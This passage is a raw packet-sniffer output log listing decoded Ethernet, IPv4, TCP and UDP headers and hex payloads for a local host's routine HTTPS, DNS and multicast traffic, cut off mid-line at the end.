\xf7\xd2\x44\x78\xcd\xf9\x65\xcf\x56\xd8\xbc\x54\xf5\xec\xdb\xea\x44\x8a\x71 236 | \xfe\x27\x66\xff\x1a\x72\xe1\xc5\x31\xaf\xeb\xab\x0e\xbe\x25\xb7\x97\xb2\x84 237 | \xed\x54\x82\x43\xff\x43\x0a\x91\xa8\x69\xa1\x73\xde\xce\xdf\x51\xd4\x50\x25 238 | \x10\x89\x47\x05\xbf\x35\x8a\x3b\xb5\x96\x27\x26\x62\xcf\x03\x34\xe7\x1e\x99 239 | \xf8\x2f\x5a\x0e\xb7\x8b\xbb\xd1\x1b\x0f\x19\x57\xb7\x95\xd2\x8b\x42\xbc\xba 240 | \xff\x05\x1c\x93\x42\x10\x17\x43\x6f\xb3\x5d\x52\x62\x63\x90\xa2\x21\x4f\xb2 241 | \x56\x8a\x80\x78\xf4\xa7\xed\x59\xd5\xd3\xad\xa4\xec\x81\x95\x4a\x63\x72\xfb 242 | \xf0\xc4\x14\x03\x9f\x0a\xb8\x37\x7f\x42\x7f\xdd\x24\xca\x74\xb0\x7b\xa1\x45 243 | \xea\x67\x0d\xec\x0e\x72\xc2\xf7\x81\x7a\x33\x38\x50\x47\xdf\x07\xa7\x5c\x19 244 | \xe5\xd7\xd0\xdf\x89\x46\xba\xb4\x55\xf7\xf5\x56\x9c\x20\xf5\xec\xd1\x75\x49 245 | \x55\xa9\x7e\x2e\x74\x5a\x94\x4d\x82\xd0\x84\x53\xdf\xc4\x8f\xcb\xbf\x18\x07 246 | \x40\xde\xd9\x55\x50\xdf\x37\xc4\x71\xb3\x9c\x67\xaa\x55\x59\xd0\xab\x8a\x7b 247 | \x0e\x9b\x20\xfe\x74\x90\xaa\xd6\x77\x88\x92\x28\x83\x46\xb7\x0e\x29\xa1\x37 248 | \x24\x3f\x3f\x59\xb7\xec\x1d\xfa\x5e\xf5\x5e\x06\x17\xdb\x42\x39\xfd\xf6\x5e 249 | \xd6\x08\xca\xf8\x95\x02\xe9\xe5\xdc\xec\xb4\xcf\x1a\xf2\x43\x42\xbb\xe6\x86 250 | \x7b\xe1\x88\x7c\x93\x03\x80\x5c\x47\x3e\x6a\xb6\xf9\xf2\x60\x68\xab\x54\x12 251 | \x1f\xab\x2c\xa0\x5f\xbc\xd9\xf0\xb8\xc1\x92\x93\x27\x54\x24\x01\xbb\xe5\xeb 252 | \x05\x03\x08\x20\x5d\xf8\x88\x1b\xd4\x31\x12\x10\xc8\xbb\x99\xd5\x7d\x35\x66 253 | \x3e\x2a\x5f\x3c\xc7\x94\xc2\x63\xff\x75\x6a\xc6\xbd\x4a\x31\xd4\xbe\xc6\xcb 254 | \x93\xeb\x50\xe5\x7c\xd7\x6b\x96\xdf\x52\x5b\x7b\x11\x45\xb2\x68\x0c\x0d\xfb 255 | \x93\x92\x9f\xe0\x54\xbe\x27\xda\x93\x8a\x25\x77\x5e\x3e\x04\xe1\xc3\xe2\x67 256 | \x51\xaf\x8d\x92\x3c\xf4\x25\x24\xeb\x40\xcf\xa8\xa7\x1c\x49\x4a\x5b\x4b\x3c 257 | \xc5\x4e\x8e\xf0\x31\x3a\xf6\xdc\xac\x13\x1d\x2c\x3f\xbe\x97\xc5\xec\xc5\x9c 258 | \xbc\x3c\xbd\xc1\xd5\x8a\xc0\x48\x26\xce\x97\x7a\x7d\x9d\x59\x4e\x9e\x7b\x7f 259 | \x33\x83\x18\x1a\x43\x58\xb4\x48\x8c\x19\x4a\x78\x82\x5b\x10\x00\x54\xd6\xd1 260 | \x18\x1d\x1e\xec\x71\x6f\x22\xd0\xc6\x36\x9b\x80\x06\x81\x79\xa7\x88\x9e\xf0 261 | \xe9\x15\x5d\x7c\x36\xb8\x13\x75\x3e\x15\x6c\xb2\x33\xc7\xeb\xa3\x71\x5f\x50 262 | \x39\xa9\xe8\x67\x84\x8b\x12\x1d\x85\x66\x1e\xaa\x7b\x12\x47\x2f\x0c\x89\xf9 263 | \x38\x8c\x62\xd7\x25\xd6\x40\xcd\xbe\xa4\x5a\x27\x41\x2a\x99\xf8\x35\x57\x15 264 | \xa7\xe4\xb1\x4f\x2e\xc8\x81\x9f\x1f\xa3\x37\xa9\x84\x97\xa8\x2c\xb1\x89\xe7 265 | \x41\x99\xa7\x4e\x49\x8e\x93\xfc\x17\x1e\x8f\xbf\x42\x8e\x4f\x6b\x78\x81\xbb 266 | \x81\x7d\x5a\x7a\xc3\xcf\x51\x7c\x7e\x27\x56\xa5\x0c\x5e\xd6\xa7\x1a\x0f\x6c 267 | \x15\xe8\xf6\x45\x9e\xf1\x6e\x07\xb8\xda\xd4\x73\xda\xaf\x01\x10\x4e\xb9\x40 268 | \x47\x67\x9f\x8a\x91\x90\xfa\xd4\x6b\x85\x51\xb7\x77\xd8\xa1\x7d\xff\xcb\xf3 269 | \xbd\xc1\x44\x11\x27\xd6\xfa\xd8\x3c\xe4\x62\x01\x40\x6a\xf4\x5f\xe1\x28\xce 270 | \x7b\x83\xbf\x20\x88\x0d\x66\x5f\xdf\x6d\x55\x6e\x0d\xc3\x70\x77\xe9\x8a\x94 271 | \x64\xcc\xe7\x00\xfc\x02\xe5\xfd\x8f\x42\x50\x28\x4f\xae\x37\x29\x3f\x44\xdf 272 | \x54\x8a\x4c\xe7\x8f\x29\x17\xc7\xeb\xcb\xa9\x94\x5f\xc5\x83\xa1\x82\x10\x64 273 | \xb2\x33\x02\x84\x71\xea\x6d\xa3\x8a\x51\x63\xf5 274 | 275 | Ethernet Frame: 276 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 277 | - IPv4 Packet: 278 | - Version: 4, Header Length: 20, TTL: 59, 279 | - Protocol: 6, Source: 172.217.24.227, Target: 192.168.0.7 280 | - TCP Packet: 281 | - Source Port: 443, Destination Port: 59918 282 | - Sequence: 3863023036, Acknowledgement: 399128352 283 | - Flags: 284 | - URG: 0, ACK: 1, PSH: 1, RST: 0, SYN: 0, fin: 0 285 | - Data: 286 | \x03\x7b\x31\xa1\x72\x16\x05\x7d\x4f\x9a\x2b\x27\x3f\xa0\x4a\x63\x48\x6d\x91 287 | \xe1\x55\x39\x7e\x81\x9d\xcd\xae\x8e\x0f\x39\x0a\xbe\xf8\x92\xc4\x32\x0e\xc1 288 | \x1d\x75\x54\xfc\x44\x04\x05\x47\xdc\x77\xfc\xab\x12\x15\x2d\xfd\x7b\xbc\x71 289 | \x51\xf2\xca\x93\x66\xbb\x50\xf7\x4b\xa3\xc1\xfa\x8a\x34\xab\xa4\x1d\x67\x38 290 | \x05\xe1\x38\xc6\x45\xd5\x9a\x77\xc4\x5f\xa4\x7a\x6d\x7f\x4b\xab\x2e\x9c\x4f 291 | \x47\x75\x36\x67\x6b\xa8\xbf\x2e\xd4\xbd\xf9\x29\xc4\x52\xd8\xe6\x23\x89\x27 292 | \x9b\x29\xf9\xfc\x0c\xed\xdf\x1d\x06\xed\x1b\x1c\xd2\x10\x78\x62\xc6\x8b\xdf 293 | \x81\x13\xd6\xbc\x0e\x8c\xf9\xa6\xc1\x59\x94\xd0\xf5\x5d\xbe\xcc\x1f\x2b\x08 294 | \x70\xf2\x99\x1c\x5d\xca\x80\x56\x61\x2b\x35\x37\x3c\x35\x02\x53\x4e\xa3\x89 295 | \x01\x88\x31\x70\x3d\xa7\x89\x20\xa7\x1b\x37\x1b\x71\xdc\x97\xd3\x0f\x98\x8f 296 | \x25\x06\xdd\x4d\x7c\xb1\x74\xcd\x0f\x6c\x06\x45\xd8\x5a\x9f\x80\xd8\xf8\x71 297 | \x8d\xcf\x36\xcf\x8c\x9e\x3b\x01\xa6\xcf\x53\x11\xca\xb5\xf9\xef\x81\x55\xe6 298 | \x6d\x20\x06\xd8\xd9\x1c\x92\x12\x64\x60\x68\x9b\xc9\xc7\x33\x2d\x04\x39\x12 299 | \x4d\xbf\xe2\x1c\x1c\x42\xfc\x81\x9d\x8a\x5a\x33\xb2\xdf\xae\x68\xfb\x52\xaf 300 | \x19\xe7\x87\xea\xac\x6a\x50\x1f\x01\xfc\x07\xd8\xa5\x44\xee\x9b\x18\xb3\x4a 301 | \x05\x56\x31\x1c\x12\xd9\x79\xf6\x85\xe6\xc4\x9d\x7e\x4e\xf5\x64\xd0\x60\x2a 302 | \x01\x7d\x70\x70\x62\x1b\x3d\x44\xab\x05\x36\x36\x4e\xe7\x10\x69\x4b\x79\x4a 303 | \x93\xfb\xf7\x20\x65\x5f\x44\x01\x39\x99\xff\x72\x65\x69\x88\x33\x3a\xa6\x0c 304 | \x6b\x80\x20\xeb\x33\x46\xa1\xd5\x45\xeb\x28\xae\x99\x21\x99\x2a\xbf\x83\x1e 305 | \x45\x80\x5d\x04\x9c\x94\x51\xbd\xa0\x40\x2d\xc1\x78\xad\xb6\xc1\x89\x7f\x7e 306 | \x74\xa9\x0c\xe8\x3c\x0f\x64\x8e\xcc\xac\x12\xad\x59\x48\x93\x3c\xef\x16\x8f 307 | \x28\xcc\x20\xa6\x1b\x67\x67\xab\x71\x6c\x48\xfd\x7c\x5d\x19\x2d\x68\xe0\xc2 308 | \x57\x55\x4c\x8a\x97\xa7\xbf\xac\x58\x63\xe2\xac\x88\xe3\xba\xd0\x31\x9c\x84 309 | \xfc\x4e\x9a\xf4\x5b\xa7\xd6\xb9\xcd\x6c\x62\xa1\x6a\x88\xfc\xd9\x28\x16\x06 310 | \x16\xe6\xff\xd5\x8e\x52\xbc\x5e\xd4\xf0\xb4\x48\xf1\xfa\x30\xbf\xca\x92\xc0 311 | \x04\x32\xa4\x6a\x17\xa4\x8a\xc6\xa1\x46\x49\xab\xde\x9b\x04\xca\x01\x80 312 | 313 | Ethernet Frame: 314 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 315 | - IPv4 Packet: 316 | - Version: 4, Header Length: 20, TTL: 64, 317 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.227 318 | - TCP Packet: 319 | - Source Port: 59918, Destination Port: 443 320 | - Sequence: 399128398, Acknowledgement: 3863023529 321 | - Flags: 322 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 323 | - Data: 324 | 325 | 326 | Ethernet Frame: 327 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 328 | - IPv4 Packet: 329 | - Version: 4, Header Length: 20, TTL: 59, 330 | - Protocol: 6, Source: 172.217.24.227, Target: 192.168.0.7 331 | - TCP Packet: 332 | - Source Port: 443, Destination Port: 59918 333 | - Sequence: 3863023529, Acknowledgement: 399128398 334 | - Flags: 335 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 336 | - Data: 337 | 338 | 339 | Ethernet Frame: 340 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 341 | - IPv4 Packet: 342 | - Version: 4, Header Length: 20, TTL: 58, 343 | - Protocol: 6, Source: 172.217.24.227, Target: 192.168.0.7 344 | - TCP Packet: 345 | - Source Port: 443, Destination Port: 59884 346 | - Sequence: 1253867305, Acknowledgement: 605020790 347 | - Flags: 348 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 1 349 | - Data: 350 | 351 | 352 | Ethernet Frame: 353 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 354 | - IPv4 Packet: 355 | - Version: 4, Header Length: 20, TTL: 58, 356 | - Protocol: 6, Source: 172.217.24.238, Target: 192.168.0.7 357 | - TCP Packet: 358 | - Source Port: 443, Destination Port: 43332 359 | - Sequence: 1593808885, Acknowledgement: 2243770240 360 | - Flags: 361 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 1 362 | - Data: 363 | 364 | 365 | Ethernet Frame: 366 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 367 | - IPv4 Packet: 368 | - Version: 4, Header Length: 20, TTL: 58, 369 | - Protocol: 6, Source: 172.217.24.227, Target: 192.168.0.7 370 | - TCP Packet: 371 | - Source Port: 443, Destination Port: 59880 372 | - Sequence: 1992165704, Acknowledgement: 2416812748 373 | - Flags: 374 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 1 375 | - Data: 376 | 377 | 378 | Ethernet Frame: 379 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 380 | - IPv4 Packet: 381 | - Version: 4, Header Length: 20, TTL: 64, 382 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.227 383 | - TCP Packet: 384 | - Source Port: 59884, Destination Port: 443 385 | - Sequence: 605020790, Acknowledgement: 1253867306 386 | - Flags: 387 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 388 | - Data: 389 | 390 | 391 | Ethernet Frame: 392 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 393 | - IPv4 Packet: 394 | - Version: 4, Header Length: 20, TTL: 64, 395 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.238 396 | - TCP Packet: 397 | - Source Port: 43332, Destination Port: 443 398 | - Sequence: 2243770240, Acknowledgement: 1593808886 399 | - Flags: 400 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 401 | - Data: 402 | 403 | 404 | Ethernet Frame: 405 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 406 | - IPv4 Packet: 407 | - Version: 4, Header Length: 20, TTL: 64, 408 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.227 409 | - TCP Packet: 410 | - Source Port: 59880, Destination Port: 443 411 | - Sequence: 2416812748, Acknowledgement: 1992165705 412 | - Flags: 413 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 414 | - Data: 415 | 416 | 417 | Ethernet Frame: 418 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 419 | - IPv4 Packet: 420 | - Version: 4, Header Length: 20, TTL: 47, 421 | - Protocol: 6, Source: 216.58.212.206, Target: 192.168.0.7 422 | - TCP Packet: 423 | - Source Port: 443, Destination Port: 52628 424 | - Sequence: 3139147330, Acknowledgement: 1263712279 425 | - Flags: 426 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 1 427 | - Data: 428 | 429 | 430 | Ethernet Frame: 431 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 432 | - IPv4 Packet: 433 | - Version: 4, Header Length: 20, TTL: 64, 434 | - Protocol: 6, Source: 192.168.0.7, Target: 216.58.212.206 435 | - TCP Packet: 436 | - Source Port: 52628, Destination Port: 443 437 | - Sequence: 1263712279, Acknowledgement: 3139147331 438 | - Flags: 439 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 440 | - Data: 441 | 442 | 443 | Ethernet Frame: 444 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 445 | - IPv4 Packet: 446 | - Version: 4, Header Length: 20, TTL: 61, 447 | - Protocol: 17, Source: 202.88.149.25, Target: 192.168.0.7 448 | - UDP Packet: 449 | - Source Port: 53, Destination Port: 37166, Length: 59067 450 | - Data: 451 | \xec\x76\x81\x83\x00\x01\x00\x00\x00\x01\x00\x00\x0a\x69\x6a\x75\x65\x70\x72 452 | \x79\x6c\x78\x6d\x00\x00\x01\x00\x01\x00\x00\x06\x00\x01\x00\x00\x2a\x30\x00 453 | \x40\x01\x61\x0c\x72\x6f\x6f\x74\x2d\x73\x65\x72\x76\x65\x72\x73\x03\x6e\x65 454 | \x74\x00\x05\x6e\x73\x74\x6c\x64\x0c\x76\x65\x72\x69\x73\x69\x67\x6e\x2d\x67 455 | \x72\x73\x03\x63\x6f\x6d\x00\x78\x3a\x81\x45\x00\x00\x07\x08\x00\x00\x03\x84 456 | \x00\x09\x3a\x80\x00\x01\x51\x80 457 | 458 | Ethernet Frame: 459 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 460 | - IPv4 Packet: 461 | - Version: 4, Header Length: 20, TTL: 61, 462 | - Protocol: 17, Source: 202.88.149.25, Target: 192.168.0.7 463 | - UDP Packet: 464 | - Source Port: 53, Destination Port: 43624, Length: 22011 465 | - Data: 466 | \x8c\x94\x81\x83\x00\x01\x00\x00\x00\x01\x00\x00\x0f\x71\x79\x6b\x70\x63\x77 467 | \x6c\x74\x7a\x76\x69\x6c\x61\x76\x6d\x00\x00\x01\x00\x01\x00\x00\x06\x00\x01 468 | \x00\x00\x2a\x30\x00\x40\x01\x61\x0c\x72\x6f\x6f\x74\x2d\x73\x65\x72\x76\x65 469 | \x72\x73\x03\x6e\x65\x74\x00\x05\x6e\x73\x74\x6c\x64\x0c\x76\x65\x72\x69\x73 470 | \x69\x67\x6e\x2d\x67\x72\x73\x03\x63\x6f\x6d\x00\x78\x3a\x81\x45\x00\x00\x07 471 | \x08\x00\x00\x03\x84\x00\x09\x3a\x80\x00\x01\x51\x80 472 | 473 | Ethernet Frame: 474 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 475 | - IPv4 Packet: 476 | - Version: 4, Header Length: 20, TTL: 61, 477 | - Protocol: 17, Source: 202.88.149.25, Target: 192.168.0.7 478 | - UDP Packet: 479 | - Source Port: 53, Destination Port: 41059, Length: 16702 480 | - Data: 481 | \x80\xec\x81\x83\x00\x01\x00\x00\x00\x01\x00\x00\x07\x77\x75\x75\x7a\x77\x71 482 | \x75\x00\x00\x01\x00\x01\x00\x00\x06\x00\x01\x00\x00\x2a\x30\x00\x40\x01\x61 483 | \x0c\x72\x6f\x6f\x74\x2d\x73\x65\x72\x76\x65\x72\x73\x03\x6e\x65\x74\x00\x05 484 | \x6e\x73\x74\x6c\x64\x0c\x76\x65\x72\x69\x73\x69\x67\x6e\x2d\x67\x72\x73\x03 485 | \x63\x6f\x6d\x00\x78\x3a\x81\x45\x00\x00\x07\x08\x00\x00\x03\x84\x00\x09\x3a 486 | \x80\x00\x01\x51\x80 487 | 488 | Ethernet Frame: 489 | - Destination: 01:00:5E:00:00:FB, Source: DC:4A:3E:F5:40:A1, Protocol: 8 490 | - IPv4 Packet: 491 | - Version: 4, Header Length: 24, TTL: 1, 492 | - Protocol: 2, Source: 192.168.0.7, Target: 224.0.0.251 493 | - Data: 494 | \x16\x00\x09\x04\xe0\x00\x00\xfb 495 | 496 | Ethernet Frame: 497 | - Destination: 01:00:5E:00:00:FB, Source: DC:4A:3E:F5:40:A1, Protocol: 8 498 | - IPv4 Packet: 499 | - Version: 4, Header Length: 24, TTL: 1, 500 | - Protocol: 2, Source: 192.168.0.7, Target: 224.0.0.251 501 | - Data: 502 | \x16\x00\x09\x04\xe0\x00\x00\xfb 503 | 504 | Ethernet Frame: 505 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 506 | - IPv4 Packet: 507 | - Version: 4, Header Length: 20, TTL: 64, 508 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.234 509 | - TCP Packet: 510 | - Source Port: 39460, Destination Port: 443 511 | - Sequence: 1674541971, Acknowledgement: 628781614 512 | - Flags: 513 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 514 | - Data: 515 | 516 | 517 | Ethernet Frame: 518 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 519 | - IPv4 Packet: 520 | - Version: 4, Header Length: 20, TTL: 59, 521 | - Protocol: 6, Source: 172.217.24.234, Target: 192.168.0.7 522 | - TCP Packet: 523 | - Source Port: 443, Destination Port: 39460 524 | - Sequence: 628781614, Acknowledgement: 1674541972 525 | - Flags: 526 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 527 | - Data: 528 | 529 | 530 | Ethernet Frame: 531 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 532 | - IPv4 Packet: 533 | - Version: 4, Header Length: 20, TTL: 64, 534 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.17.78 535 | - TCP Packet: 536 | - Source Port: 45954, Destination Port: 443 537 | - Sequence: 2096459641, Acknowledgement: 672358669 538 | - Flags: 539 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 540 | - Data: 541 | 542 | 543 | Ethernet Frame: 544 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 545 | - IPv4 Packet: 546 | - Version: 4, Header Length: 20, TTL: 64, 547 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.225 548 | - TCP Packet: 549 | - Source Port: 56596, Destination Port: 443 550 | - Sequence: 470744482, Acknowledgement: 136404652 551 | - Flags: 552 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 553 | - Data: 554 | 555 | 556 | Ethernet Frame: 557 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 558 | - IPv4 Packet: 559 | - Version: 4, Header Length: 20, TTL: 64, 560 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.234 561 | - TCP Packet: 562 | - Source Port: 39466, Destination Port: 443 563 | - Sequence: 3933043918, Acknowledgement: 2174575844 564 | - Flags: 565 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 566 | - Data: 567 | 568 | 569 | Ethernet Frame: 570 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 571 | - IPv4 Packet: 572 | - Version: 4, Header Length: 20, TTL: 59, 573 | - Protocol: 6, Source: 172.217.24.225, Target: 192.168.0.7 574 | - TCP Packet: 575 | - Source Port: 443, Destination Port: 56596 576 | - Sequence: 136404652, Acknowledgement: 470744483 577 | - Flags: 578 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 579 | - Data: 580 | 581 | 582 | Ethernet Frame: 583 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 584 | - IPv4 Packet: 585 | - Version: 4, Header Length: 20, TTL: 59, 586 | - Protocol: 6, Source: 172.217.24.234, Target: 192.168.0.7 587 | - TCP Packet: 588 | - Source Port: 443, Destination Port: 39466 589 | - Sequence: 2174575844, Acknowledgement: 3933043919 590 | - Flags: 591 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 592 | - Data: 593 | 594 | 595 | Ethernet Frame: 596 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 597 | - IPv4 Packet: 598 | - Version: 4, Header Length: 20, TTL: 49, 599 | - Protocol: 6, Source: 172.217.17.78, Target: 192.168.0.7 600 | - TCP Packet: 601 | - Source Port: 443, Destination Port: 45954 602 | - Sequence: 672358669, Acknowledgement: 2096459642 603 | - Flags: 604 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 605 | - Data: 606 | 607 | 608 | Ethernet Frame: 609 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 610 | - IPv4 Packet: 611 | - Version: 4, Header Length: 20, TTL: 64, 612 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.237 613 | - TCP Packet: 614 | - Source Port: 55616, Destination Port: 443 615 | - Sequence: 1610940833, Acknowledgement: 678953769 616 | - Flags: 617 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 618 | - Data: 619 | 620 | 621 | Ethernet Frame: 622 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 623 | - IPv4 Packet: 624 | - Version: 4, Header Length: 20, TTL: 64, 625 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.31.8 626 | - TCP Packet: 627 | - Source Port: 33810, Destination Port: 443 628 | - Sequence: 3667574523, Acknowledgement: 3591218350 629 | - Flags: 630 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 631 | - Data: 632 | 633 | 634 | Ethernet Frame: 635 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 636 | - IPv4 Packet: 637 | - Version: 4, Header Length: 20, TTL: 64, 638 | - Protocol: 6, Source: 192.168.0.7, Target: 52.84.101.111 639 | - TCP Packet: 640 | - Source Port: 53004, Destination Port: 443 641 | - Sequence: 1428731855, Acknowledgement: 3026416073 642 | - Flags: 643 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 644 | - Data: 645 | 646 | 647 | Ethernet Frame: 648 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 649 | - IPv4 Packet: 650 | - Version: 4, Header Length: 20, TTL: 64, 651 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.237 652 | - TCP Packet: 653 | - Source Port: 55608, Destination Port: 443 654 | - Sequence: 506279765, Acknowledgement: 762273941 655 | - Flags: 656 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 657 | - Data: 658 | 659 | 660 | Ethernet Frame: 661 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 662 | - IPv4 Packet: 663 | - Version: 4, Header Length: 20, TTL: 59, 664 | - Protocol: 6, Source: 172.217.24.237, Target: 192.168.0.7 665 | - TCP Packet: 666 | - Source Port: 443, Destination Port: 55616 667 | - Sequence: 678953769, Acknowledgement: 1610940834 668 | - Flags: 669 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 670 | - Data: 671 | 672 | 673 | Ethernet Frame: 674 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 675 | - IPv4 Packet: 676 | - Version: 4, Header Length: 20, TTL: 59, 677 | - Protocol: 6, Source: 172.217.24.237, Target: 192.168.0.7 678 | - TCP Packet: 679 | - Source Port: 443, Destination Port: 55608 680 | - Sequence: 762273941, Acknowledgement: 506279766 681 | - Flags: 682 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 683 | - Data: 684 | 685 | 686 | Ethernet Frame: 687 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 688 | - IPv4 Packet: 689 | - Version: 4, Header Length: 20, TTL: 59, 690 | - Protocol: 6, Source: 172.217.31.8, Target: 192.168.0.7 691 | - TCP Packet: 692 | - Source Port: 443, Destination Port: 33810 693 | - Sequence: 3591218350, Acknowledgement: 3667574524 694 | - Flags: 695 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 696 | - Data: 697 | 698 | 699 | Ethernet Frame: 700 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 701 | - IPv4 Packet: 702 | - Version: 4, Header Length: 20, TTL: 249, 703 | - Protocol: 6, Source: 52.84.101.111, Target: 192.168.0.7 704 | - TCP Packet: 705 | - Source Port: 443, Destination Port: 53004 706 | - Sequence: 3026416073, Acknowledgement: 1428731856 707 | - Flags: 708 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 709 | - Data: 710 | 711 | 712 | Ethernet Frame: 713 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 714 | - IPv4 Packet: 715 | - Version: 4, Header Length: 20, TTL: 64, 716 | - Protocol: 6, Source: 192.168.0.7, Target: 172.217.24.238 717 | - TCP Packet: 718 | - Source Port: 43360, Destination Port: 443 719 | - Sequence: 3702866493, Acknowledgement: 455476024 720 | - Flags: 721 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 722 | - Data: 723 | 724 | 725 | Ethernet Frame: 726 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 727 | - IPv4 Packet: 728 | - Version: 4, Header Length: 20, TTL: 59, 729 | - Protocol: 6, Source: 172.217.24.238, Target: 192.168.0.7 730 | - TCP Packet: 731 | - Source Port: 443, Destination Port: 43360 732 | - Sequence: 455476024, Acknowledgement: 3702866494 733 | - Flags: 734 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 735 | - Data: 736 | 737 | 738 | Ethernet Frame: 739 | - Destination: F8:E9:03:F4:5C:48, Source: DC:4A:3E:F5:40:A1, Protocol: 8 740 | - IPv4 Packet: 741 | - Version: 4, Header Length: 20, TTL: 64, 742 | - Protocol: 6, Source: 192.168.0.7, Target: 74.125.68.188 743 | - TCP Packet: 744 | - Source Port: 43928, Destination Port: 5228 745 | - Sequence: 802069633, Acknowledgement: 1496319004 746 | - Flags: 747 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 0 748 | - Data: 749 | 750 | 751 | Ethernet Frame: 752 | - Destination: DC:4A:3E:F5:40:A1, Source: F8:E9:03:F4:5C:48, Protocol: 8 753 | - IPv4 Packet: 754 | - Version: 4, Header Length: 20, TTL: 44, 755 | - Protocol: 6, Source: 74.125.68.188, Target: 192.168.0.7 756 | - TCP Packet: 757 | - Source Port: 5228, Destination Port: 43928 758 | - Sequence: 1496319004, Acknowledgement: 802069634 759 | - Flags: 760 | - URG: 0, ACK: 1, PSH: 0, RST: 0, SYN: 0, fin: 